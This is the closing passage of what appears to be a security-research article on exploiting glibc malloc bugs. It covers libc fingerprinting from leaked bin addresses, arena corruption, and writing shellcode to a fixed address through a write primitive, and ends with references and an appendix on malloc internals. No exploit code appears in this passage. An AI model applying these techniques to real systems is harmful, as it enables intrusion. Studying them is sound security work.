Finally, the loop shellcode gets executed... 5 crashes were needed,
|
|
stepping 8 bytes each time. Playing with the STEP and the ADJUST values
|
|
and the do_little() function will yield different results.
|
|
|
|
--] 4.5.4 Libc fingerprinting
|
|
|
|
Having a bin address allows us to recognize the libc version being
|
|
attacked.
|
|
We just need to build a database with different libcs from different
|
|
distributions to match the obtained bin address and bin number.
|
|
Knowing exactly which is the libc the target process has loaded gives us
|
|
the exact absolute address of any location within libc, such as:
|
|
function pointers, internal structures, flags, etc. This information can
|
|
be abused to build several attacks in different scenarios, i.e. knowing
|
|
the location of functions and strings allows to easily craft return into
|
|
libc attacks [14].
|
|
|
|
Besides, knowing the libc version enables us to know which Linux
|
|
distribution is running the target host. These could allow further
|
|
exploitation in case we are not able to exploit the bug (the one we are
|
|
using to leak the bin address) to execute code.
|
|
|
|
--] 4.5.5 Arena corruption (top, last remainder and bin modification)
|
|
|
|
From the previously gathered main_arena address, we know the location of
|
|
any bin, including the top chunk and the last reminder chunk.
|
|
Corrupting any of this pointers will completely modify the allocator
|
|
behavior. Right now, I don't have any code to confirm this, but there are
|
|
lot of possibilities open for research here, as an attacker might be
|
|
able to redirect a whole bin into his own supplied input.
|
|
|
|
---------------------------------------------------------------------------
|
|
--] 4.6 Copying the shellcode 'by hand'
|
|
|
|
Other trick that allows the attacker to know the exact location of the
|
|
injected shellcode, is copying the shellcode to a fixed address using the
|
|
aa4bmo primitive.
|
|
As we can't write any value, using unaligned writes is needed to create
|
|
the shellcode in memory, writting 1 or 2 bytes each time.
|
|
We need to be able to copy the whole shellcode before the server crashes
|
|
in order to use this technique.
|
|
|
|
---------------------------------------------------------------------------
|
|
--] 5 Conclusions
|
|
|
|
malloc based vulnerabilities provide a huge opportunity for fully
|
|
automated exploitation.
|
|
The ability to transform the aa4bmo primitive into memory leak primitives
|
|
allows the attacker to exploit processes without any prior knowledge, even
|
|
in presence of memory layout randomization schemes.
|
|
|
|
[ Note by editors: It came to our attention that the described
|
|
technique might not work for the glibc 2.3 serie. ]
|
|
|
|
---------------------------------------------------------------------------
|
|
--] 6 Thanks
|
|
|
|
I'd like to thank a lot of people: 8a, beto, gera, zb0, raddy, juliano,
|
|
kato, javier burroni, fgsch, chipi, MaXX, lck, tomas, lau, nahual, daemon,
|
|
module, ...
|
|
Classifying you takes some time (some 'complex' ppl), so I'll just say
|
|
thank you for encouraging me to write this article, sharing your ideas,
|
|
letting me learn a lot from you every day, reviewing the article,
|
|
implementing the morecore idea for first time, being my friends, asking
|
|
for torta, not making torta, personal support, coding nights, drinking
|
|
beer, ysm, roquefort pizza, teletubbie talking, making work very
|
|
interesting, making the world a happy place to live, making people hate
|
|
you because of the music...
|
|
(you should know which applies for you, do not ask)
|
|
|
|
---------------------------------------------------------------------------
|
|
--] 7 References
|
|
|
|
[1] http://www.malloc.de/malloc/ptmalloc2.tar.gz
|
|
ftp://g.oswego.edu/pub/misc/malloc.c
|
|
[2] www.phrack.org/phrack/57/p57-0x08
|
|
Vudo - An object superstitiously believed to embody magical power
|
|
Michel "MaXX" Kaempf
|
|
[3] www.phrack.org/phrack/57/p57-0x09
|
|
Once upon a free()
|
|
anonymous
|
|
[4] http://www.phrack.org/show.php?p=59&a=7
|
|
Advances in format string exploitation
|
|
gera and riq
|
|
[5] http://www.coresecurity.com/common/showdoc.php? \
|
|
idx=359&idxseccion=13&idxmenu=32
|
|
About exploits writing
|
|
gera
|
|
[6] http://online.securityfocus.com/bid/5363
|
|
[7] http://security.e-matters.de/advisories/012003.txt
|
|
[8] http://www.openwall.com/advisories/OW-002-netscape-jpeg.txt
|
|
JPEG COM Marker Processing Vulnerability in Netscape Browsers
|
|
Solar Designer
|
|
[9] http://lists.insecure.org/lists/bugtraq/2000/Nov/0086.html
|
|
Local root exploit in LBNL traceroute
|
|
Michel "MaXX" Kaempf
|
|
[10] http://www.w00w00.org/files/articles/heaptut.txt
|
|
w00w00 on Heap Overflows
|
|
Matt Conover & w00w00 Security Team
|
|
[11] http://www.phrack.org/show.php?p=49&a=14
|
|
Smashing The Stack For Fun And Profit
|
|
Aleph One
|
|
[12] http://phrack.org/show.php?p=55&a=8
|
|
The Frame Pointer Overwrite
|
|
klog
|
|
[13] http://www.phrack.org/show.php?p=59&a=9
|
|
Bypassing PaX ASLR protection
|
|
p59_09@author.phrack.org
|
|
[14] http://phrack.org/show.php?p=58&a=4
|
|
The advanced return-into-lib(c) exploits
|
|
Nergal
|
|
|
|
|
|
|
|
---------------------------------------------------------------------------
|
|
Appendix I - malloc internal structures overview
|
|
|
|
This appendix contains a brief overview about some details of malloc
|
|
inner workings we need to have in mind in order to fully understand most
|
|
of the techniques explained in this paper.
|
|
|
|
Free consolidated 'chunks' of memory are maintained mainly
|
|
(forgetting the top chunk and the last_remainder chunk) in
|
|
circular double-linked lists, which are initially empty and evolve
|
|
with the heap layout. The circularity of these lists is very important
|
|
for us, as we'll see later on.
|
|
|
|
A 'bin' is a pair of pointers from where these lists hang. There
|
|
exist 128 (#define NAV 128) bins, which may be 'small' bins or 'big
|
|
bins'. Small bins contain equally sized chunks, while big bins are
|
|
composed of not the same size chunks, ordered by decreasing size.
|
|
|
|
These are the macros used to index into bins depending of its size:
|
|
|
|
#define MAX_SMALLBIN 63
|
|
#define MAX_SMALLBIN_SIZE 512
|
|
#define SMALLBIN_WIDTH 8
|
|
#define is_small_request(nb) ((nb) < MAX_SMALLBIN_SIZE - SMALLBIN_WIDTH)
|
|
#define smallbin_index(sz) (((unsigned long)(sz)) >> 3)
|
|
#define bin_index(sz) \
|
|
(((((unsigned long)(sz)) >> 9) == 0) ? (((unsigned long)(sz)) >> 3):\
|
|
((((unsigned long)(sz)) >> 9) <= 4) ? 56 + (((unsigned long)(sz)) >> 6):\
|
|
((((unsigned long)(sz)) >> 9) <= 20) ? 91 + (((unsigned long)(sz)) >> 9):\
|
|
((((unsigned long)(sz)) >> 9) <= 84) ? 110 + (((unsigned long)(sz)) >> 12):\
|
|
((((unsigned long)(sz)) >> 9) <= 340) ? 119 + (((unsigned long)(sz)) >> 15):\
|
|
((((unsigned long)(sz)) >> 9) <= 1364) ? 124 + (((unsigned long)(sz)) >> 18):\
|
|
126)
|
|
|
|
From source documentation we know that 'an arena is a configuration
|
|
of malloc_chunks together with an array of bins. One or more 'heaps'
|
|
are associated with each arena, except for the 'main_arena', which is
|
|
associated only with the 'main heap', i.e. the conventional free
|
|
store obtained with calls to MORECORE()...', which is the one we are
|
|
interested in.
|
|
|
|
This is the way an arena looks like...
|
|
|
|
typedef struct _arena {
|
|
mbinptr av[2*NAV + 2];
|
|
struct _arena *next;
|
|
size_t size;
|
|
#if THREAD_STATS
|
|
long stat_lock_direct, stat_lock_loop, stat_lock_wait;
|
|
#endif
|
|
|
|
'av' is the array where bins are kept.
|
|
|
|
These are the macros used along the source code to access the bins,
|
|
we can see the first two bins are never indexed; they refer to the
|
|
topmost chunk, the last_remainder chunk and a bitvector used to
|
|
improve seek time, though this is not really important for us.
|
|
|
|
/* bitvector of nonempty blocks */
|
|
#define binblocks(a) (bin_at(a,0)->size)
|
|
/* The topmost chunk */
|
|
#define top(a) (bin_at(a,0)->fd)
|
|
/* remainder from last split */
|
|
#define last_remainder(a) (bin_at(a,1))
|
|
|
|
#define bin_at(a, i) BOUNDED_1(_bin_at(a, i))
|
|
#define _bin_at(a, i) ((mbinptr)((char*)&(((a)->av)[2*(i)+2]) - 2*SIZE_SZ))
|
|
|
|
|
|
Finally, the main_arena...
|
|
|
|
#define IAV(i) _bin_at(&main_arena, i), _bin_at(&main_arena, i)
|
|
static arena main_arena = {
|
|
{
|
|
0, 0,
|
|
IAV(0), IAV(1), IAV(2), IAV(3), IAV(4), IAV(5), IAV(6), IAV(7),
|
|
IAV(8), IAV(9), IAV(10), IAV(11), IAV(12), IAV(13), IAV(14), IAV(15),
|
|
IAV(16), IAV(17), IAV(18), IAV(19), IAV(20), IAV(21), IAV(22), IAV(23),
|
|
IAV(24), IAV(25), IAV(26), IAV(27), IAV(28), IAV(29), IAV(30), IAV(31),
|
|
IAV(32), IAV(33), IAV(34), IAV(35), IAV(36), IAV(37), IAV(38), IAV(39),
|
|
IAV(40), IAV(41), IAV(42), IAV(43), IAV(44), IAV(45), IAV(46), IAV(47),
|
|
IAV(48), IAV(49), IAV(50), IAV(51), IAV(52), IAV(53), IAV(54), IAV(55),
|
|
IAV(56), IAV(57), IAV(58), IAV(59), IAV(60), IAV(61), IAV(62), IAV(63),
|
|
IAV(64), IAV(65), IAV(66), IAV(67), IAV(68), IAV(69), IAV(70), IAV(71),
|
|
IAV(72), IAV(73), IAV(74), IAV(75), IAV(76), IAV(77), IAV(78), IAV(79),
|
|
IAV(80), IAV(81), IAV(82), IAV(83), IAV(84), IAV(85), IAV(86), IAV(87),
|
|
IAV(88), IAV(89), IAV(90), IAV(91), IAV(92), IAV(93), IAV(94), IAV(95),
|
|
IAV(96), IAV(97), IAV(98), IAV(99), IAV(100), IAV(101), IAV(102), IAV(103),
|
|
IAV(104), IAV(105), IAV(106), IAV(107), IAV(108), IAV(109), IAV(110), IAV(111),
|
|
IAV(112), IAV(113), IAV(114), IAV(115), IAV(116), IAV(117), IAV(118), IAV(119),
|
|
IAV(120), IAV(121), IAV(122), IAV(123), IAV(124), IAV(125), IAV(126), IAV(127)
|
|
},
|
|
&main_arena, /* next */
|
|
0, /* size */
|
|
#if THREAD_STATS
|
|
0, 0, 0, /* stat_lock_direct, stat_lock_loop, stat_lock_wait */
|
|
#endif
|
|
MUTEX_INITIALIZER /* mutex */
|
|
};
|
|
|
|
The main_arena is the place where the allocator stores the 'bins' to which
|
|
the free chunks are linked depending on they size.
|
|
|
|
The little graph below resumes all the structures detailed before:
|
|
|
|
<main_arena> @ libc's DATA
|
|
|
|
[bin_n] (first chunk)
|
|
ptr] ----> [<- chunk ->] [<- chunk ->] [<- fd
|
|
[ chunk
|
|
ptr] ----> [<- chunk ->] [<- chunk ->] [<- bk
|
|
[bin_n+1] (last chunk)
|
|
|
|
.
|
|
.
|
|
.
|
|
|
|
[bin_X]
|
|
ptr] ----> [<- fd
|
|
[ lonely but interesting chunk
|
|
ptr] ----> [<- bk
|
|
.
|
|
.
|
|
|
|
|=[ EOF ]=---------------------------------------------------------------=|
|
|
|